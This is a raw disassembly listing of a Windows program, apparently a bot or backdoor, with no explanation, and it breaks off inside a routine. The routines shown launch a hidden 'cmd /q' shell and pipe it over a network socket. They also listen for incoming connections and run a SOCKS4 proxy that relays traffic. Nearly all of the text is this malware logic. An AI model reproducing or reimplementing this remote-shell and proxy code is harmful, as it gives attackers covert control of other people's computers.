cmp eax, 0FFFFFFFFh
jz short loc_411627
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44C2FC ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415C77
push edi ; int
lea eax, [ebp+Source]
push 9 ; int
push eax ; Source
call sub_40B78E
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_45712C[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_411278
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_45713C[ecx], eax
jz short loc_4116FA
loc_4116E7: ; CODE XREF: sub_411506+1F2�j
cmp [ebp+var_38], esi
jnz loc_411627
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4116E7
; ---------------------------------------------------------------------------
loc_4116FA: ; CODE XREF: sub_411506+1DF�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C340 ; "-"
call sub_415CEB
pop ecx
pop ecx
jmp short loc_411712
; ---------------------------------------------------------------------------
loc_41170F: ; CODE XREF: sub_411506+C8�j
; sub_411506+EC�j ...
mov edi, [ebp+arg_0]
loc_411712: ; CODE XREF: sub_411506+13C�j
; sub_411506+207�j
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Source]
push offset asc_44C37C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_411752
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_40] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409D6C
add esp, 14h
loc_411752: ; CODE XREF: sub_411506+22A�j
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
push edi
call dword_4E42B8 ; closesocket
push ebx
call dword_4E42B8 ; closesocket
call dword_4E4178 ; WSACleanup
push [ebp+var_4C]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop ebx
loc_411784: ; DATA XREF: sub_411506+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_411506 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41178E proc near ; CODE XREF: sub_411278+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_4118DF
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_457134[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_4F6384
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411AB1
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4117F9
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C3B4 ; "-"
call sub_415CEB
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_411833
; ---------------------------------------------------------------------------
loc_4117F9: ; CODE XREF: sub_41178E+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411B63
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_41183A
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C3FC ; "-"
call sub_415CEB
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4F63B4 ; TerminateThread
loc_411833: ; CODE XREF: sub_41178E+69�j
xor eax, eax
jmp loc_4118DA
; ---------------------------------------------------------------------------
loc_41183A: ; CODE XREF: sub_41178E+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_4F6430 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_411894
dec eax
jz short loc_41188E
dec eax
jz short loc_41187A
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C444 ; "-"
call sub_415CEB
pop ecx
pop ecx
jmp short loc_4118A9
; ---------------------------------------------------------------------------
loc_41187A: ; CODE XREF: sub_41178E+D5�j
mov edi, ds:dword_4F63B4
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4118A9
; ---------------------------------------------------------------------------
loc_41188E: ; CODE XREF: sub_41178E+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_411898
; ---------------------------------------------------------------------------
loc_411894: ; CODE XREF: sub_41178E+CF�j
push ebx
push dword ptr [esi+14h]
loc_411898: ; CODE XREF: sub_41178E+104�j
call ds:dword_4F63B4 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4F63F8 ; TerminateProcess
loc_4118A9: ; CODE XREF: sub_41178E+EA�j
; sub_41178E+FE�j
push dword ptr [esi+10h]
mov edi, ds:dword_4F6370
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4E42B8 ; closesocket
push esi ; Memory
call _free
pop ecx
push 1
pop eax
loc_4118DA: ; CODE XREF: sub_41178E+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_41178E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118DF proc near ; CODE XREF: sub_41178E+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h ; Size
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call _malloc
mov esi, eax
pop ecx
cmp esi, edi
jz loc_4119C9
mov ebx, ds:dword_4F6404
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:dword_4F6370
test eax, eax
jnz short loc_411942
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_44C478
jmp short loc_411962
; ---------------------------------------------------------------------------
loc_411942: ; CODE XREF: sub_4118DF+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_41196A
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C4B8 ; "-"
loc_411962: ; CODE XREF: sub_4118DF+61�j
call sub_415CEB
pop ecx
jmp short loc_411998
; ---------------------------------------------------------------------------
loc_41196A: ; CODE XREF: sub_4118DF+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_4119D8
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_4119CD
push offset unk_44C4F8
call sub_415C77
loc_411998: ; CODE XREF: sub_4118DF+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4119A4
push [ebp+var_4]
call edi ; CloseHandle
loc_4119A4: ; CODE XREF: sub_4118DF+BE�j
cmp [ebp+var_8], 0
jz short loc_4119AF
push [ebp+var_8]
call edi ; CloseHandle
loc_4119AF: ; CODE XREF: sub_4118DF+C9�j
mov eax, [esi]
test eax, eax
jz short loc_4119B8
push eax
call edi ; CloseHandle
loc_4119B8: ; CODE XREF: sub_4118DF+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_4119C2
push eax
call edi ; CloseHandle
loc_4119C2: ; CODE XREF: sub_4118DF+DE�j
push esi ; Memory
call _free
pop ecx
loc_4119C9: ; CODE XREF: sub_4118DF+1D�j
xor eax, eax
jmp short loc_4119D3
; ---------------------------------------------------------------------------
loc_4119CD: ; CODE XREF: sub_4118DF+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_4119D3: ; CODE XREF: sub_4118DF+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4118DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4119D8 proc near ; CODE XREF: sub_4118DF+94�p
Dst = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_4], esi
call _memset
push 10h ; Size
lea eax, [ebp+var_14]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+Dst], edi
mov edi, ds:dword_4F6400
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_4F63FC ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dst]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_4F6374 ; CreateProcessA
test eax, eax
jz short loc_411A94
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_457130[eax], ecx
call ds:dword_4F6370 ; CloseHandle
jmp short loc_411AAA
; ---------------------------------------------------------------------------
loc_411A94: ; CODE XREF: sub_4119D8+9A�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C528 ; "-"
call sub_415CEB
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_411AAA: ; CODE XREF: sub_4119D8+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4119D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411AB1 proc near ; DATA XREF: sub_41178E+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_4F63F0
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_411ADA: ; CODE XREF: sub_411AB1+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_411B42
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_411B15
loc_411AEB: ; CODE XREF: sub_411AB1+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_411B05
cmp dl, 0Dh
jz short loc_411B05
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_411B05: ; CODE XREF: sub_411AB1+44�j
; sub_411AB1+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_411AEB
loc_411B15: ; CODE XREF: sub_411AB1+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_4E4270 ; send
test eax, eax
jle short loc_411B42
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_411ADA
; ---------------------------------------------------------------------------
loc_411B42: ; CODE XREF: sub_411AB1+2D�j
; sub_411AB1+79�j
mov esi, ds:dword_4F6394
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411B5E
call esi ; RtlGetLastWin32Error
push eax ; Args
push offset asc_44C560 ; "-"
call sub_415CEB
pop ecx
pop ecx
loc_411B5E: ; CODE XREF: sub_411AB1+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_411AB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411B63 proc near ; DATA XREF: sub_41178E+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_411B7C: ; CODE XREF: sub_411B63+39�j
; sub_411B63+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_4E4238 ; recv
test eax, eax
jle loc_411C81
cmp [ebp+var_10], ebx
jbe short loc_411B9E
dec [ebp+var_10]
jmp short loc_411B7C
; ---------------------------------------------------------------------------
loc_411B9E: ; CODE XREF: sub_411B63+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411C61
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_411C0E
cmp al, 7Fh
jz short loc_411C0E
cmp al, 3
jnz short loc_411BC9
push ebx
push ebx
call ds:dword_4F6434 ; GenerateConsoleCtrlEvent
jmp short loc_411C35
; ---------------------------------------------------------------------------
loc_411BC9: ; CODE XREF: sub_411B63+5A�j
cmp al, 15h
jnz short loc_411BEB
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_411C21
; ---------------------------------------------------------------------------
loc_411BEB: ; CODE XREF: sub_411B63+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_411C22
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_411C21
; ---------------------------------------------------------------------------
loc_411C0E: ; CODE XREF: sub_411B63+52�j
; sub_411B63+56�j
cmp esi, ebx
jbe short loc_411C38
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_411C21: ; CODE XREF: sub_411B63+86�j
; sub_411B63+A9�j
pop ecx
loc_411C22: ; CODE XREF: sub_411B63+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_4E4270 ; send
test eax, eax
jle short loc_411C81
loc_411C35: ; CODE XREF: sub_411B63+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_411C38: ; CODE XREF: sub_411B63+AD�j
cmp al, 0Dh
jnz loc_411B7C
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4F63E8 ; WriteFile
test eax, eax
jz short loc_411C81
xor esi, esi
jmp loc_411B7C
; ---------------------------------------------------------------------------
loc_411C61: ; CODE XREF: sub_411B63+47�j
cmp [ebp+var_C], ebx
jnz short loc_411C72
mov [ebp+var_C], 1
jmp loc_411B7C
; ---------------------------------------------------------------------------
loc_411C72: ; CODE XREF: sub_411B63+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_411B7C
; ---------------------------------------------------------------------------
loc_411C81: ; CODE XREF: sub_411B63+2B�j
; sub_411B63+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_411B63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C86 proc near ; DATA XREF: sub_401CC7+2C10�o
Source = byte ptr -2D4h
var_D4 = dword ptr -0D4h
Str = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
push 1
xor esi, esi
pop edi
mov [eax+0A8h], edi
push ebx ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_40]
call dword_4E4220 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_4E42A0 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_457134[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E424C ; bind
test eax, eax
jnz loc_411E28
push 0Ah
push edi
call dword_4E4248 ; listen
test eax, eax
jnz loc_411E28
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Source]
push offset asc_44C59C ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_411D61
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_409D6C
add esp, 14h
loc_411D61: ; CODE XREF: sub_411C86+B9�j
; sub_411C86+172�j ...
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_4E42B4 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_44C5C4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 19h ; int
push eax ; Source
call sub_40B78E
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_45712C[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_411E8B
push esi
push esi
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_45713C[ecx], eax
jz short loc_411E08
loc_411DF5: ; CODE XREF: sub_411C86+180�j
cmp [ebp+var_28], esi
jnz loc_411D61
push 5
call ds:dword_4F6380 ; Sleep
jmp short loc_411DF5
; ---------------------------------------------------------------------------
loc_411E08: ; CODE XREF: sub_411C86+16D�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_44C608 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_411D61
; ---------------------------------------------------------------------------
loc_411E28: ; CODE XREF: sub_411C86+7B�j
; sub_411C86+8C�j
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_40]
lea eax, [ebp+Source]
push offset asc_44C644 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_411E6B
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_D4] ; int
call sub_409D6C
add esp, 14h
loc_411E6B: ; CODE XREF: sub_411C86+1C3�j
lea eax, [ebp+Source]
push eax
call sub_415C77
push [ebp+var_3C]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_411C86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E8B proc near ; DATA XREF: sub_411C86+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
Dst = byte ptr -4C8h
var_C8 = byte ptr -0C8h
Str2 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_457134[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_4E4208 ; select
test eax, eax
jnz short loc_411F0C
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_411F0C: ; CODE XREF: sub_411E8B+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_4E4238 ; recv
test eax, eax
jg short loc_411F3D
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_411F3D: ; CODE XREF: sub_411E8B+98�j
cmp [ebp+var_4D0], 4
jnz loc_412137
cmp [ebp+var_4CF], 1
jnz loc_412137
cmp [ebp+Str2], bl
jz short loc_411FD3
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_411FD3
lea eax, [ebp+Str2]
push eax
lea eax, [ebp+Dst]
push eax ; Args
push offset dword_44C678 ; Format
call sub_415CEB
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call _memset
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E4270 ; send
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_411FD3: ; CODE XREF: sub_411E8B+CF�j
; sub_411E8B+E5�j
push 10h ; Size
lea eax, [ebp+var_18]
push ebx ; Val
push eax ; Dst
call _memset
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_4E42A0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41206B
call dword_4E41B4 ; WSAGetLastError
push eax ; Args
push offset dword_44C6B8 ; Format
call sub_415CEB
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E4270 ; send
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_41206B: ; CODE XREF: sub_411E8B+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4120DA
call dword_4E41B4 ; WSAGetLastError
push eax ; Args
push offset dword_44C6F8 ; Format
call sub_415CEB
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call _memset
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E4270 ; send
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_4120DA: ; CODE XREF: sub_411E8B+1F0�j
push 400h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call _memset
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_4E4270 ; send
push dword ptr [esi]
push edi
call sub_41214F
pop ecx
pop ecx
push edi
call dword_4E42B8 ; closesocket
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_412137: ; CODE XREF: sub_411E8B+B9�j
; sub_411E8B+C6�j
push dword ptr [esi]
call dword_4E42B8 ; closesocket
push [ebp+arg_0]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
sub_411E8B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41214F proc near ; CODE XREF: sub_411E8B+286�p
Dst = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_412165: ; CODE XREF: sub_41214F+C5�j
; sub_41214F+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_41217D: ; CODE XREF: sub_41214F+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_41218D
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_41217D
loc_41218D: ; CODE XREF: sub_41214F+33�j
cmp ecx, 1
jnz short loc_4121A2
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_4121A2: ; CODE XREF: sub_41214F+41�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_4E4208 ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_4E410C ; __WSAFDIsSet
test eax, eax
jz short loc_412202
push edi
lea eax, [ebp+Dst]
push esi
push eax
push ebx
call dword_4E4238 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_41224A
push edi
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41224A
loc_412202: ; CODE XREF: sub_41214F+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4E410C ; __WSAFDIsSet
test eax, eax
jz loc_412165
push edi
lea eax, [ebp+Dst]
push esi
push eax
push [ebp+arg_0]
call dword_4E4238 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_41224A
push edi
push eax
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jnz loc_412165
loc_41224A: ; CODE XREF: sub_41214F+9A�j
; sub_41214F+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41214F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41224F proc near ; CODE XREF: sub_41224F:loc_4126C0�p
; DATA XREF: sub_401CC7+20CD�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_778 = dword ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
